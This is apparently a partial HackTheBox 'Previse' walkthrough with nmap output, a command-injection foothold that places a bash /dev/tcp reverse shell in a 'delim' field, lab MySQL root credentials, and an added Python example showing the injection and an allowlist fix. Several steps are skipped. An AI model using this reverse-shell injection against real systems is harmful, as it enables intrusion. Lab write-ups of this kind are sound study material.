HackTheBox — Previse

Nmap Scan

nmap -sC -sV -oA previse 10.10.11.104

Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-13 12:08 EET
Nmap scan report for 10.10.11.104
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumerating HTTP

Browsing to http://10.10.11.104 redirects us to http://10.10.11.104/login.php.

Initial Foothold

Let's replace the ping command with a reverse shell and run a netcat listener:

delim=space;bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'
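
Why a delim value containing ';' is dangerous, and the fix, as an added example that is not code from the box or from this write-up. It assumes the application pastes delim into a shell command line; HELPER is a hypothetical stand-in for the real command, and the delimiter names other than space are hypothetical.

```python
import shlex
import subprocess

# Assumption: the server appends the "delim" request value to a helper command.
# HELPER is a hypothetical stand-in; the page does not show the real command.
HELPER = ["echo", "delim"]
# Only "space" appears on the page; the other names are hypothetical.
ALLOWED_DELIMS = {"space", "comma", "tab"}
# The value from the write-up, placeholders left as printed there.
PAGE_VALUE = "space;bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'"


def vulnerable_cmdline(delim):
    """Unsafe pattern: the request value is pasted into a shell string."""
    return " ".join(HELPER) + " " + delim


def shell_commands(cmdline):
    """Split a command line into the separate commands a POSIX shell would run.

    Simplified: ignores command substitution and newlines, and a quoted token
    made only of ; & | also counts as a separator (errs towards over-reporting).
    """
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    lexer.commenters = ""
    commands, current = [], []
    for token in lexer:
        if token and set(token) <= set(";&|"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def safe_argv(delim):
    """Hardened pattern: allowlist the value, then pass it as one argv entry."""
    if delim not in ALLOWED_DELIMS:
        raise ValueError("unsupported delimiter: %r" % delim)
    return HELPER + [delim]


if __name__ == "__main__":
    print(shell_commands(vulnerable_cmdline("space")))     # one command
    print(shell_commands(vulnerable_cmdline(PAGE_VALUE)))  # two commands
    # No shell is involved here, so metacharacters have no special meaning.
    print(subprocess.run(safe_argv("space"), capture_output=True, text=True).stdout)
```

The allowlist is the actual control; the argv form without a shell is the second layer that keeps any value a single argument.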

Getting User

After some enumeration I couldn't find anything, but remember the MySQL credentials we got before? Let's log in to MySQL using root:mySQL_p@ssw0rd!:)

Getting Root

Running sudo -l shows that we can run /opt/scripts/access_backup.sh as root.
